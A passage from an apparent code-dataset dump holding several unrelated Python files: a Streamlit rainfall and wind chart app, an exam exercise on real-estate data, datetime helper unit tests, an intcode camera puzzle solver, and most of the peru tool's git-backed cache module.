2020]\n\t\t\tfiltered_2019 = tmp_tokia7[tmp_tokia7['Urtea'] == 2019]\n\t\t\tfiltered_2018 = tmp_tokia7[tmp_tokia7['Urtea'] == 2018]\n\t\t\tfiltered_2017 = tmp_tokia7[tmp_tokia7['Urtea'] == 2017]\n\t\t\tfiltered_2016 = tmp_tokia7[tmp_tokia7['Urtea'] == 2016]\n\t\t\tfiltered_2015 = tmp_tokia7[tmp_tokia7['Urtea'] == 
2015]\n\t\t\tfiltered_2014 = tmp_tokia7[tmp_tokia7['Urtea'] == 2014]\n\t\t\tfiltered_2013 = tmp_tokia7[tmp_tokia7['Urtea'] == 2013]\n\t\t\t\n\t\t\tdatuak_2023=filtered_2023.sort_values(['Hilab'],ascending=True).groupby(['Hilab'], sort = False).sum()['Euria']\n\t\t\tdatuak_2022=filtered_2022.sort_values(['Hilab'],ascending=True).groupby(['Hilab'], sort = False).sum()['Euria']\n\t\t\tdatuak_2021=filtered_2021.sort_values(['Hilab'],ascending=True).groupby(['Hilab'], sort = False).sum()['Euria']\n\t\t\tdatuak_2020=filtered_2020.sort_values(['Hilab'],ascending=True).groupby(['Hilab'], sort = False).sum()['Euria']\n\t\t\tdatuak_2019=filtered_2019.sort_values(['Hilab'],ascending=True).groupby(['Hilab'], sort = False).sum()['Euria']\n\t\t\tdatuak_2018=filtered_2018.sort_values(['Hilab'],ascending=True).groupby(['Hilab'], sort = False).sum()['Euria']\n\t\t\tdatuak_2017=filtered_2017.sort_values(['Hilab'],ascending=True).groupby(['Hilab'], sort = False).sum()['Euria']\n\t\t\tdatuak_2016=filtered_2016.sort_values(['Hilab'],ascending=True).groupby(['Hilab'], sort = False).sum()['Euria']\n\t\t\tdatuak_2015=filtered_2015.sort_values(['Hilab'],ascending=True).groupby(['Hilab'], sort = False).sum()['Euria']\n\t\t\tdatuak_2014=filtered_2014.sort_values(['Hilab'],ascending=True).groupby(['Hilab'], sort = False).sum()['Euria']\n\t\t\tdatuak_2013=filtered_2013.sort_values(['Hilab'],ascending=True).groupby(['Hilab'], sort = False).sum()['Euria']\n\n\t\t\tbatera = pd.concat([datuak_2023,datuak_2022,datuak_2021,datuak_2020,datuak_2019,datuak_2018,datuak_2017,datuak_2016,\n\t\t\t\tdatuak_2015,datuak_2014,datuak_2013], ignore_index=True, axis=1)\n\t\t\tbatera=batera.rename(columns = {0:'2023',1:'2022',2:'2021',3:'2020',4:'2019',5:'2018',6:'2017',7:'2016',8:'2015',9:'2014',10:'2013'})\n\n\t\t\n\t\t#st.dataframe(datuak_ta7)\n\t\tst.table(batera.style.format(\"{:.1f}\"))\n\n##=================================\n## Grafika 1: Leku baterako, euria urteka\n##=================================\n\nst.header('## Gràfica 1: Pluja anual a cada municipi')\nst.markdown('Primer, amb el menú, tria el municipi') \nst.markdown('Despres, pren el botó de sota') \n\n\nwith st.form('Grafika1'):\n\n\tselected_toki1 = st.selectbox(label='Municipi', options=df_all['Tokia'].unique())\n\tsubmitted1 = st.form_submit_button('Envia selecció')\n\n\tif submitted1:\n\t\tfiltered_tokia1 = df_all[df_all['Tokia'] == selected_toki1]\n\t\tdatuak_gr1=filtered_tokia1.sort_values(['Urtea'],ascending=True).groupby(['Urtea'], sort = False).sum()['Euria'] \n\t\tchart_data1 = datuak_gr1\n\t\tst.bar_chart(chart_data1)\n\n##=================================\n## Grafika 2: Leku baterako eta urte baterako, euria hilabeteka\n##=================================\n\nst.header('## Gràfica 2: Pluja mensual per any i per municipi')\nst.markdown('Primer, amb el menú, tria el municipi') \nst.markdown('Segon, amb el altre menú, tria l\\'any') \nst.markdown('Finalment, pren el botó de sota') \n\nwith st.form('Grafika2'):\n\n\tselected_toki2 = st.selectbox(label='Municipi', options=df_all['Tokia'].unique())\n\t#selected_urte2 = st.selectbox(label='Any', options=df_all['Urtea'].unique())\n\t#Goiko aukerarekin, urteak desordenatuta daude. 
Eskuz jarriko ditut\n\tselected_urte2 = st.selectbox(label='Any', options=[2023,2022,2021,2020,2019,2018,2017,2016,2015,2014,2013])\n\tsubmitted2 = st.form_submit_button('Envia selecció')\n\n\tif submitted2:\n\t\t\n\n\t\ttmp_tokia2 = df_all[df_all['Tokia'] == selected_toki2]\n\t\tfiltered_2 = tmp_tokia2[tmp_tokia2['Urtea'] == selected_urte2]\n\t\tdatuak_gr2=filtered_2.sort_values(['Hilab'],ascending=True).groupby(['Hilab'], sort = False).sum()['Euria'] \n\t\tchart_data2 = datuak_gr2\n\t\tif (selected_urte2<2019 and (selected_toki2=='vilaplana' or selected_toki2=='la-mussara' or \n\t\t\tselected_toki2=='lalbiol' or selected_toki2=='laleixar' or selected_toki2=='alforja')):\n\t\t\tst.markdown(\"Per aquest municipi, dades disponibles a partir de l'any 2019\")\n\t\telse:\n\t\t\tst.bar_chart(chart_data2)\n\n##=================================\n## Grafika 3: Leku baterako, bi urteko euria konparatu hilabeteka\n##=================================\n#Ez det lortu\n\n##=================================\n## Grafika 4: Leku baterako eta urte baterako, haize-egunak hilabetero\n##=================================\n\nst.header('## Gràfica 3: Dies de vent anual a cada municipi')\nst.markdown('Per a un municipi, quans dies de vent hi van haver-hi.') \nst.markdown('Es pot triar la velocitat mínima del vent') \n\n\nwith st.form('Grafika4'):\n\n\tselected_toki4 = st.selectbox(label='Municipi', options=df_all['Tokia'].unique())\n\tselected_vel = st.slider('Velocitat mínima del vent', 0, 100, 10)\n\tsubmitted4 = st.form_submit_button('Envia selecció')\n\n\tif submitted4:\n\t\ttmp_tokia4 = df_all[df_all['Tokia'] == selected_toki4]\n\t\tfiltered_gr4 = tmp_tokia4[tmp_tokia4['Vmax'] > selected_vel]\n\t\tdatuak_gr4=filtered_gr4.sort_values(['Urtea'],ascending=True).groupby(['Urtea']).agg(np.size)['Vmax']\n\t\t\n\t\tchart_data4 = datuak_gr4\n\t\t#st.write(datuak_gr4)\n\t\tst.bar_chart(chart_data4)\n\n\n","repo_name":"niregauzak/Eguraldia_Streamlit","sub_path":"eguraldia_str.py","file_name":"eguraldia_str.py","file_ext":"py","file_size_in_byte":12773,"program_lang":"python","lang":"ca","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"4270841140","text":"def parse(name):\n tab = open(f'dane/{name}.txt', 'r').read().split('\\n')[:-1]\n tab = [ dict(zip(tab[0].split('\\t'), i.split('\\t'))) for i in tab[1:]]\n globals()[name] = tab\n\nparse('klienci')\nparse('agenci')\nparse('oferta')\nparse('zainteresowanie')\n\n#6.1\nimiona = {i['Id_agenta'] : f\"{i['Imie']} {i['Nazwisko']}\" for i in agenci}\nag = {i['Id_oferty'] : i['Id_agenta'] for i in oferta}\n\nfrom collections import defaultdict as dd\nans = dd(lambda:0)\nfor i in zainteresowanie:\n ind = i['Id_oferty']\n ans[ind] += 1\nans = sorted(ans.items(), key=lambda x:x[1])[-1]\nprint(imiona[ag[ans[0]]], ans[0])\n\n#6.2\nprint()\nans = dd(lambda:[0,0])\nw = set()\nfor i in oferta:\n c = int(i['Cena'])\n ind= i['Woj ']\n ans[ind][0] += c\n ans[ind][1] += 1\n w.add(ind)\nw = list(w)\nw.sort()\nfor i in w:\n print(i, round(ans[i][0]/ans[i][1],2))\n\n#6.3\nprint()\n\nfor i in oferta:\n bas = i['Id_oferty'].strip()[-2:] == 'MT'\n st = i['Status'].strip() == 'A'\n if not bas or not st: continue\n\n ind = i['Id_oferty']\n name = imiona[ag[ind]]\n print(ind, name, i['Woj '], i['Pow'], i['Cena'])\n\n#6.4\nprint()\n\ntab = set()\nfor i in oferta:\n y = i['Data_zglosz'].split('-')[0] == '2017'\n st = i['Status'].strip() == 'S'\n if not y or not st: continue\n\n tab.add(i['Id_agenta'])\n\nfor i in agenci:\n if i['Id_agenta'] in tab: continue\n 
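# --- Editor's addition (hedged sketch, not part of either record above) ---
# The Taula7 block of eguraldia_str.py above builds one hand-filtered frame
# per year (filtered_2023 ... filtered_2013). Assuming only the df_all
# columns it already uses ('Tokia', 'Urtea', 'Hilab', 'Euria'), one
# pivot_table produces the same month-by-year rain table; the function name
# is illustrative.
import pandas as pd

def monthly_rain_by_year(df_all: pd.DataFrame, tokia: str) -> pd.DataFrame:
    # rows = month, columns = year, values = summed daily rain
    town = df_all[df_all['Tokia'] == tokia]
    return town.pivot_table(index='Hilab', columns='Urtea', values='Euria', aggfunc='sum')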
print(imiona[i['Id_agenta']])\n\n#6.5\nprint()\n\nfor i in oferta:\n st = i['Status'].strip() == 'A'\n ok = int(i['Pow']) > 180 and st and int(i['L_laz']) >= 2\n if not ok: continue\n\n ind = i['Id_oferty']\n p = int(i['L_pokoi'])\n l = int(i['L_laz'])\n print(ind, i['Pow'], p, l, i['Cena'], imiona[ag[ind]])\n\n\n","repo_name":"mcnuggetsx20/high-school-coding","sub_path":"matura/2019_czerwiec/z6.py","file_name":"z6.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"16792691609","text":"import unittest\nfrom datetime import datetime\n\nfrom ddt import data, ddt, unpack\nfrom truth.truth import AssertThat\n\nfrom mycalendar.lib.datetime_helper import DateTimeHelper\n\n\n@ddt\nclass DateTimeHelperTest(unittest.TestCase):\n def setUp(self):\n super().setUp()\n self.date_time_helper = DateTimeHelper()\n\n def test_calculate_days_of_week_calculates_weekdays_correctly(self):\n now = datetime.now().isocalendar()\n\n days_of_week = self.date_time_helper.calculate_days_of_week(\n now[0], now[1]\n )\n\n for i in range(1, 8):\n AssertThat(days_of_week[i - 1][\"date\"]).IsEqualTo(\n datetime.fromisocalendar(now[0], now[1], i)\n .date()\n .strftime(\"(%b. %-d)\")\n )\n AssertThat(days_of_week[i - 1][\"name\"]).IsEqualTo(\n datetime.fromisocalendar(now[0], now[1], i)\n .date()\n .strftime(\"%a\")\n )\n\n @data(\n (2020, -1, 2019, 52),\n (2020, 0, 2019, 52),\n (2020, 52, 2020, 52),\n (2020, 53, 2020, 53),\n (2020, 54, 2021, 1),\n (2021, -1, 2020, 53),\n (2021, 0, 2020, 53),\n (2021, 52, 2021, 52),\n (2021, 53, 2022, 1),\n (2021, 54, 2022, 1),\n (\n datetime.now().isocalendar()[0],\n datetime.now().isocalendar()[1],\n datetime.now().isocalendar()[0],\n datetime.now().isocalendar()[1],\n ),\n )\n @unpack\n def test_calculate_different_year_handles_anniversaries_correctly(\n self, year, week, expected_year, expected_week\n ):\n (\n calculated_year,\n calculated_week,\n ) = self.date_time_helper.calculate_different_year(year, week)\n\n AssertThat(calculated_year).IsEqualTo(expected_year)\n AssertThat(calculated_week).IsEqualTo(expected_week)\n\n @data(\n (\"0\", \"00:00:00\"),\n (\"1\", \"01:00:00\"),\n (\"2\", \"02:00:00\"),\n (\"3\", \"03:00:00\"),\n (\"4\", \"04:00:00\"),\n (\"5\", \"05:00:00\"),\n (\"6\", \"06:00:00\"),\n (\"7\", \"07:00:00\"),\n (\"8\", \"08:00:00\"),\n (\"9\", \"09:00:00\"),\n (\"10\", \"10:00:00\"),\n (\"11\", \"11:00:00\"),\n (\"12\", \"12:00:00\"),\n (\"13\", \"13:00:00\"),\n (\"14\", \"14:00:00\"),\n (\"15\", \"15:00:00\"),\n (\"16\", \"16:00:00\"),\n (\"17\", \"17:00:00\"),\n (\"18\", \"18:00:00\"),\n (\"19\", \"19:00:00\"),\n (\"20\", \"20:00:00\"),\n (\"21\", \"21:00:00\"),\n (\"22\", \"22:00:00\"),\n (\"23\", \"23:00:00\"),\n (\"24\", \"00:00:00\"),\n )\n @unpack\n def test_hour_number_to_24_hours_format_transforms_correctly(\n self, hour, expected_hour\n ):\n calculated_hour = self.date_time_helper.hour_number_to_24_hours_format(\n hour\n )\n\n AssertThat(calculated_hour).IsEqualTo(expected_hour)\n","repo_name":"kovrichard/mycalendar","sub_path":"tests/lib/datetime_helper_test.py","file_name":"datetime_helper_test.py","file_ext":"py","file_size_in_byte":2886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"33811546885","text":"import sys # argv\n\nfrom intcode import load_memory, run_program\n\nclass Camera:\n def __init__(self):\n self.grid = {}\n self.x = 0\n self.y = 0\n self.width = 0\n self.height = 0\n \n 
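# --- Editor's addition (hedged): the z6.py record above fills globals()
# from parse(); the variant below keeps the identical tab-separated parsing
# but returns the rows instead of mutating global state. The 'dane/' path
# convention comes from that record; the function name is illustrative.
def parse_rows(name):
    with open(f'dane/{name}.txt', encoding='utf-8') as f:
        lines = f.read().split('\n')
    header = lines[0].split('\t')
    return [dict(zip(header, row.split('\t'))) for row in lines[1:] if row]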
def input_func(self) -> int:\n raise NotImplementedError()\n \n def output_func(self, value: int):\n char = chr(value)\n if char == '\\n':\n self.x = 0\n self.y += 1\n else:\n self.grid[(self.x,self.y)] = {\n '.': False, '#': True,\n '^': True, 'V': True, '<': True, '>': True,\n 'X': False,\n }[char]\n self.width = max(self.width, self.x+1)\n self.height = max(self.height, self.y+1)\n self.x += 1\n \n def print_grid(self):\n for y in range(self.height):\n for x in range(self.width):\n char = '#' if self.grid[(x, y)] else '.'\n print(char, end='')\n print()\n\n# run the program to get the grid\ncamera = Camera()\nmemory = load_memory(sys.argv[1])\nrun_program(memory, camera.input_func, camera.output_func)\n\n# compute the sum of the \"alignment parameters\"\nalign_param_sum = 0\nfor x in range(1, camera.width-1):\n for y in range(1, camera.height-1):\n if all(camera.grid[pos] for pos in [(x,y),(x+1,y),(x-1,y),(x,y+1),(x,y-1)]):\n align_param_sum += x * y\nprint(align_param_sum)\n","repo_name":"qxzcode/aoc_2019","sub_path":"17/first.py","file_name":"first.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"36237415706","text":"import asyncio\nimport contextlib\nimport collections\nimport hashlib\nimport json\nimport os\nimport pathlib\nimport re\nimport textwrap\n\nfrom .async_helpers import safe_communicate\nfrom .compat import makedirs\nfrom .error import PrintableError\nfrom .keyval import KeyVal\n\n# git output modes\nTEXT_MODE = object()\nBINARY_MODE = object()\n\n# for tests\nDEBUG_GIT_COMMAND_COUNT = 0\n\n\ndef compute_key(data):\n # To hash this dictionary of fields, serialize it as a JSON string, and\n # take the SHA1 of that string. Dictionary key order is unspecified, so\n # \"sort_keys\" keeps our hash stable. Specifying separators makes the\n # JSON slightly more compact, and protects us against changes in the\n # default. \"ensure_ascii\" defaults to true, so specifying it just\n # protects us from changes in the default.\n json_representation = json.dumps(\n data, sort_keys=True, ensure_ascii=True, separators=(',', ':'))\n sha1 = hashlib.sha1()\n sha1.update(json_representation.encode(\"utf8\"))\n return sha1.hexdigest()\n\n\nclass GitSession:\n '''All of our git operations will share the same repo, but we don't want\n them to share the same index file. That's for two reasons:\n 1) We want to be able to run multiple operations in parallel that write\n to the index file.\n 2) We want to be able to save the index file corresponding to the last\n imports, and guarantee that nothing will touch it.\n A git session owns the index file it does operations on. We also use this\n class to abstract away the low level details of git command flags. 
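# --- Editor's note (hedged): compute_key() in cache.py above depends on
# sort_keys making the JSON representation canonical, so dicts that compare
# equal hash to equal SHA1 keys regardless of insertion order. A
# stdlib-only check of that property:
import hashlib
import json

def _canonical_sha1(data):
    rep = json.dumps(data, sort_keys=True, ensure_ascii=True, separators=(',', ':'))
    return hashlib.sha1(rep.encode('utf8')).hexdigest()

assert _canonical_sha1({'a': 1, 'b': 2}) == _canonical_sha1({'b': 2, 'a': 1})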
(And in\n the future, this could be where we plug in libgit2.)'''\n\n def __init__(self, git_dir, index_file, working_copy):\n self.git_dir = git_dir\n self.index_file = index_file\n self.working_copy = working_copy\n\n async def git(self, *args, input=None, output_mode=TEXT_MODE, cwd=None):\n global DEBUG_GIT_COMMAND_COUNT\n DEBUG_GIT_COMMAND_COUNT += 1\n command = ['git']\n command.append('--git-dir=' + self.git_dir)\n if self.working_copy:\n command.append(\"--work-tree=\" + self.working_copy)\n command.extend(args)\n if isinstance(input, str):\n input = input.encode()\n process = await asyncio.subprocess.create_subprocess_exec(\n *command,\n cwd=cwd,\n env=self.git_env(),\n stdin=asyncio.subprocess.PIPE,\n stdout=asyncio.subprocess.PIPE,\n stderr=asyncio.subprocess.PIPE)\n stdout, stderr = await safe_communicate(process, input)\n stderr = stderr.decode()\n if output_mode == TEXT_MODE:\n stdout = stdout.decode()\n stdout = stdout.rstrip()\n if process.returncode != 0:\n raise GitError(command, process.returncode, stdout, stderr)\n return stdout\n\n def git_env(self):\n 'Set the index file and prevent git from reading global configs.'\n env = dict(os.environ)\n for var in [\"HOME\", \"XDG_CONFIG_HOME\"]:\n env.pop(var, None)\n env[\"GIT_CONFIG_NOSYSTEM\"] = \"true\"\n # Weirdly, GIT_INDEX_FILE is interpreted relative to the work tree. As\n # a workaround, we absoluteify the path.\n env[\"GIT_INDEX_FILE\"] = os.path.abspath(self.index_file)\n return env\n\n async def init_git_dir(self):\n await self.git('init', '--bare')\n\n async def read_tree_into_index(self, tree):\n await self.git('read-tree', tree)\n\n async def read_tree_and_stats_into_index(self, tree):\n await self.read_tree_into_index(tree)\n # Refresh all the stat() information in the index.\n try:\n # This throws an error on modified files. Suppress it.\n await self.git('update-index', '--refresh')\n except GitError as e:\n if 'needs update' not in e.stdout:\n # Reraise any errors we don't recognize.\n raise\n\n async def make_tree_from_index(self):\n tree = await self.git('write-tree')\n return tree\n\n async def read_working_copy_into_index(self, picks):\n # Use --force to avoid .gitignore rules. We shouldn't respect them.\n if picks:\n # As in list_tree_entries, prepend ./ to avoid interpreting leading\n # colons in pathspecs.\n picks = [\"./\" + pick for pick in picks]\n await self.git('add', '--force', '--', *picks)\n else:\n await self.git('add', '--all', '--force')\n\n async def drop_paths_from_index(self, paths):\n if not paths:\n return\n # As in list_tree_entries, prepend ./ to avoid interpreting leading\n # colons in pathspecs.\n paths = [\"./\" + path for path in paths]\n ls_output = await self.git(\n 'ls-files', '--full-name', '-z', *paths, output_mode=BINARY_MODE)\n await self.git(\n 'update-index', '--force-remove', '-z', '--stdin', input=ls_output)\n\n async def merge_tree_into_index(self, tree, prefix):\n # The --prefix argument to read-tree chokes on paths that contain dot\n # or dot-dot. Instead of './', it wants the empty string. Oblige it.\n # NOTE: This parameter must be forward-slash-separated, even on\n # Windows. os.path.normpath() is not correct here!\n prefix_path = pathlib.PurePosixPath(prefix)\n assert '..' not in prefix_path.parts\n prefix_arg = prefix_path.as_posix()\n prefix_arg = '' if prefix_arg == '.' else prefix_arg\n # Normally read-tree with --prefix wants to make sure changes don't\n # stomp on the working copy. 
The -i flag ignores the working copy.\n await self.git('read-tree', '-i', '--prefix', prefix_arg, tree)\n\n async def working_copy_matches_index(self):\n diff_output = await self.git('diff-files', output_mode=BINARY_MODE)\n return len(diff_output) == 0\n\n async def get_modified_files_skipping_deletes(self):\n # We want to ignore deleted files, so we exclude only deletes using\n # 'd' instead of including all of the capital letter forms.\n # https://git-scm.com/docs/git-diff#Documentation/git-diff.txt---diff-filterACDMRTUXB82308203\n diff_output = await self.git('diff-files', '-z', '--name-only',\n '--diff-filter=d')\n return [name for name in diff_output.split('\\x00') if name]\n\n async def get_new_files_in_tree(self, previous_tree, new_tree):\n added_files_output = await self.git('diff-tree', '--diff-filter=A',\n '--name-only', '-r', '-z',\n previous_tree, new_tree)\n return added_files_output.split('\\x00')\n\n async def read_tree_updating_working_copy(self, tree, force):\n '''This method relies on the current working copy being clean with\n respect to the current index. The benefit of this over\n checkout_missing_files_from_index(), is that is clean up files that get\n deleted between the current tree and the new one. Without force, this\n raises an error rather than overwriting modified files.'''\n if force:\n await self.git('read-tree', '--reset', '-u', tree)\n else:\n await self.git('read-tree', '-m', '-u', tree)\n\n async def checkout_files_from_index(self):\n # This recreates any deleted files. As far as I can tell,\n # checkout-index has no equivalent of the --full-tree flag we use with\n # ls-tree below. Instead, the --all flag seems to respect the directory\n # from which it's invoked, and only check out files below that\n # directory. This, this is currently the only command we invoke with an\n # explicit cwd. Original bug report:\n # https://github.com/buildinspace/peru/issues/210\n await self.git('checkout-index', '--all', cwd=self.working_copy)\n\n async def get_info_for_path(self, tree, path):\n # --full-tree makes ls-tree ignore the cwd. As in list_tree_entries,\n # prepend ./ to avoid interpreting leading colons in pathspecs.\n ls_output = await self.git('ls-tree', '--full-tree', '-z', tree,\n \"./\" + path)\n ls_lines = ls_output.strip('\\x00').split('\\x00')\n # Remove empty lines.\n ls_lines = list(filter(None, ls_lines))\n if len(ls_lines) == 0:\n raise FileNotFoundError('Path \"{}\" not found in tree {}.'.format(\n path, tree))\n assert len(ls_lines) == 1\n mode, type, sha1, name = ls_lines[0].split()\n return mode, type, sha1, name\n\n async def read_bytes_from_file_hash(self, sha1):\n return (await self.git(\n 'cat-file', '-p', sha1, output_mode=BINARY_MODE))\n\n async def list_tree_entries(self, tree, path, recursive):\n # Lines in ls-tree are of the following form (note that the wide space\n # is a tab):\n # 100644 blob a2b67564ae3a7cb3237ee0ef1b7d26d70f2c213f README.md\n entry_regex = r'(\\w+) (\\w+) (\\w+)\\t(.*)'\n command = ['ls-tree', '-z', tree]\n if path is not None:\n # If we do something like `git ls-tree -r -t HEAD foo/bar`, git\n # will include foo in the output, because it was traversed. We\n # filter those entries out below, by excluding results that are\n # shorter than the original path. 
However, git will canonicalize\n # paths in its output, and we need to match that behavior for the\n # comparison to work.\n canonical_path = str(pathlib.PurePosixPath(path))\n # However, another complication: ls-tree arguments are what git\n # calls \"pathspecs\". That means that leading colons have a special\n # meaning. In order to support leading colons, we always prefix the\n # path with dot-slash in git's arguments. As noted above, the\n # dot-slash will be stripped again in the final output.\n command += [\"./\" + canonical_path]\n if recursive:\n # -t means tree entries are included in the listing.\n command += ['-r', '-t']\n output = await self.git(*command)\n if not output:\n return {}\n entries = {}\n for line in output.strip('\\x00').split('\\x00'):\n mode, type, hash, name = re.match(entry_regex, line).groups()\n if (recursive and path is not None\n and len(name) < len(canonical_path) and type == TREE_TYPE):\n # In recursive mode, leave out the parents of the target dir.\n continue\n entries[name] = TreeEntry(mode, type, hash)\n return entries\n\n async def make_tree_from_entries(self, entries):\n entry_format = '{} {} {}\\t{}'\n input = '\\x00'.join(\n entry_format.format(mode, type, hash, name)\n for name, (mode, type, hash) in entries.items())\n tree = await self.git('mktree', '-z', input=input)\n return tree\n\n\nasync def Cache(root):\n 'This is the async constructor for the _Cache class.'\n cache = _Cache(root)\n await cache._init_trees()\n return cache\n\n\nclass _Cache:\n def __init__(self, root):\n \"Don't instantiate this class directly. Use the Cache() constructor.\"\n self.root = root\n self.plugins_root = os.path.join(root, \"plugins\")\n makedirs(self.plugins_root)\n self.tmp_path = os.path.join(root, \"tmp\")\n makedirs(self.tmp_path)\n self.keyval = KeyVal(os.path.join(root, 'keyval'), self.tmp_path)\n self.trees_path = os.path.join(root, \"trees\")\n self._empty_tree = None\n\n async def _init_trees(self):\n if not os.path.exists(os.path.join(self.trees_path, 'HEAD')):\n makedirs(self.trees_path)\n with self.clean_git_session() as session:\n await session.init_git_dir()\n # Override any .gitattributes files that might be in the sync dir,\n # by writing 'info/attributes' in the bare repo. There are many\n # attributes that we might want to disable, but disabling 'text'\n # seems to take care of both 'text' and 'eol', which are the two\n # that I know can cause problems. We might need to add more\n # attributes here in the future. Note that other config files are\n # disabled in _git_env below.\n attributes_path = os.path.join(self.trees_path, 'info',\n 'attributes')\n with open(attributes_path, 'w') as attributes:\n # Disable the 'text' attribute for all files.\n attributes.write('* -text')\n\n @contextlib.contextmanager\n def clean_git_session(self, working_copy=None):\n with self.keyval.tmp_dir_context() as tmp_dir:\n # Git will initialize a nonexistent index file. 
Empty files cause\n # an error though.\n index_file = os.path.join(tmp_dir, \"index\")\n yield GitSession(self.trees_path, index_file, working_copy)\n\n def no_index_git_session(self):\n return GitSession(self.trees_path, os.devnull, os.devnull)\n\n async def get_empty_tree(self):\n if not self._empty_tree:\n with self.clean_git_session() as session:\n self._empty_tree = await session.make_tree_from_index()\n return self._empty_tree\n\n async def import_tree(self, src, *, picks=None, excludes=None):\n if not os.path.exists(src):\n raise RuntimeError('import tree called on nonexistent path ' + src)\n with self.clean_git_session(src) as session:\n await session.read_working_copy_into_index(picks)\n\n # We want to avoid ever importing a .peru directory. This is a\n # security/correctness issue similar to git's issue with .git dirs,\n # and just like git we need to watch out for case-insensitive\n # filesystems. See also:\n # https://github.com/blog/1938-vulnerability-announced-update-your-git-clients.\n full_excludes = dotperu_exclude_case_insensitive_git_globs()\n if excludes:\n full_excludes += excludes\n await session.drop_paths_from_index(full_excludes)\n\n tree = await session.make_tree_from_index()\n return tree\n\n async def merge_trees(self, base_tree, merge_tree, merge_path='.'):\n with self.clean_git_session() as session:\n if base_tree:\n await session.read_tree_into_index(base_tree)\n try:\n await session.merge_tree_into_index(merge_tree, merge_path)\n except GitError as e:\n raise MergeConflictError(e.stdout) from e\n unified_tree = await session.make_tree_from_index()\n return unified_tree\n\n async def export_tree(self,\n tree,\n dest,\n previous_tree=None,\n *,\n force=False,\n previous_index_file=None):\n '''This method is the core of `peru sync`. If the contents of \"dest\"\n match \"previous_tree\", then export_tree() updates them to match \"tree\".\n If not, it raises an error and doesn't touch any files.\n\n Because it's important for the no-op `peru sync` to be fast, we make an\n extra optimization for this case. The caller passes in the path to the\n index file used during the last sync, which should already reflect\n \"previous_tree\". That allows us to skip the read-tree and update-index\n calls, so all we have to do is a single diff-files operation to check\n for cleanliness.\n\n It's difficult to predict all the different states the index file might\n end up in under different error conditions, not only now but also in\n past and future git versions. For safety and simplicity, if any\n operation returns an error code, we delete the supplied index file.\n Right now this includes expected errors, like \"sync would overwrite\n existing files,\" and unexpected errors, like \"index is on fire.\"'''\n\n tree = tree or (await self.get_empty_tree())\n previous_tree = previous_tree or (await self.get_empty_tree())\n\n makedirs(dest)\n\n with contextlib.ExitStack() as stack:\n\n # If the caller gave us an index file, create a git session around\n # it. Otherwise, create a clean one. Note that because we delete\n # the index file whenever there are errors, we also allow the\n # caller to pass in a path to a nonexistent file. 
In that case we\n # have to pay the cost to recreate it.\n did_refresh = False\n if previous_index_file:\n session = GitSession(self.trees_path, previous_index_file,\n dest)\n stack.enter_context(delete_if_error(previous_index_file))\n if not os.path.exists(previous_index_file):\n did_refresh = True\n await session.read_tree_and_stats_into_index(previous_tree)\n else:\n session = stack.enter_context(self.clean_git_session(dest))\n did_refresh = True\n await session.read_tree_and_stats_into_index(previous_tree)\n\n # The fast path. If the previous tree is the same as the current\n # one, and no files have changed at all, short-circuit.\n if previous_tree == tree:\n if (await session.working_copy_matches_index()):\n return\n\n # Everything below is the slow path. Some files have changed, or\n # the tree has changed, or both. If we didn't refresh the index\n # file above, we must do so now.\n if not did_refresh:\n await session.read_tree_and_stats_into_index(previous_tree)\n modified = await session.get_modified_files_skipping_deletes()\n if modified and not force:\n raise DirtyWorkingCopyError(\n 'Imported files have been modified ' +\n '(use --force to overwrite):\\n\\n' +\n _format_file_lines(modified))\n\n # Do all the file updates and deletions needed to produce `tree`.\n try:\n await session.read_tree_updating_working_copy(tree, force)\n except GitError:\n # Give a more informative error if we failed because files that\n # are new in `tree` already existed in the working copy.\n new_files = await session.get_new_files_in_tree(\n previous_tree, tree)\n existing_new_files = [\n f for f in new_files\n if f and os.path.exists(os.path.join(dest, f))\n ]\n existing_new_files.sort()\n if existing_new_files:\n raise DirtyWorkingCopyError(\n 'Imports would overwrite preexisting files '\n '(use --force to write anyway):\\n\\n' +\n _format_file_lines(existing_new_files))\n else:\n # We must've failed for some other reason. Let the error\n # keep going.\n raise\n\n # Recreate any missing files.\n await session.checkout_files_from_index()\n\n async def read_file(self, tree, path):\n # TODO: Make this handle symlinks in the tree.\n with self.clean_git_session() as session:\n mode, type, sha1, name = await session.get_info_for_path(\n tree, path)\n if type == 'tree':\n raise IsADirectoryError(\n 'Path \"{}\" in tree {} is a directory.'.format(path, tree))\n assert type == 'blob'\n return (await session.read_bytes_from_file_hash(sha1))\n\n async def ls_tree(self, tree, path=None, *, recursive=False):\n session = self.no_index_git_session()\n return (await session.list_tree_entries(tree, path, recursive))\n\n async def modify_tree(self, tree, modifications):\n '''The modifications are a map of the form, {path: TreeEntry}. The tree\n can be None to indicate an empty starting tree. The entries can be\n either blobs or trees, or None to indicate a deletion. The return value\n is either the hash of the resulting tree, or None if the resulting tree\n is empty. Modifications in parent directories are done before\n modifications in subdirectories below them, so for example you can\n insert a tree at a given path and also insert more new stuff beneath\n that path, without fear of overwriting the new stuff.'''\n\n # Read the original contents of the base tree.\n if tree is None:\n entries = {}\n else:\n entries = await self.ls_tree(tree, '.')\n\n # Separate the modifications into two groups, those that refer to\n # entries at the base of this tree (e.g. 
'foo'), and those that refer\n # to entries in subtrees (e.g. 'foo/bar').\n modifications_at_base = dict()\n modifications_in_subtrees = collections.defaultdict(dict)\n for path_str, entry in modifications.items():\n # Canonicalize paths to get rid of duplicate/trailing slashes.\n path = pathlib.PurePosixPath(path_str)\n\n # Check for nonsense paths.\n # TODO: Maybe stop recursive calls from repeating these checks.\n if len(path.parts) == 0:\n raise ModifyTreeError('Cannot modify an empty path.')\n elif path.parts[0] == '/':\n raise ModifyTreeError('Cannot modify an absolute path.')\n elif '..' in path.parts:\n raise ModifyTreeError('.. is not allowed in tree paths.')\n\n if len(path.parts) == 1:\n modifications_at_base[str(path)] = entry\n else:\n first_dir = path.parts[0]\n rest = str(pathlib.PurePosixPath(*path.parts[1:]))\n modifications_in_subtrees[first_dir][rest] = entry\n\n # Insert or delete entries in the base tree. Note that this happens\n # before any subtree operations.\n for name, entry in modifications_at_base.items():\n if entry is None:\n entries.pop(name, None)\n else:\n entries[name] = entry\n\n # Recurse to compute modified subtrees. Note how we handle deletions:\n # If 'a' is a file, inserting a new file at 'a/b' will 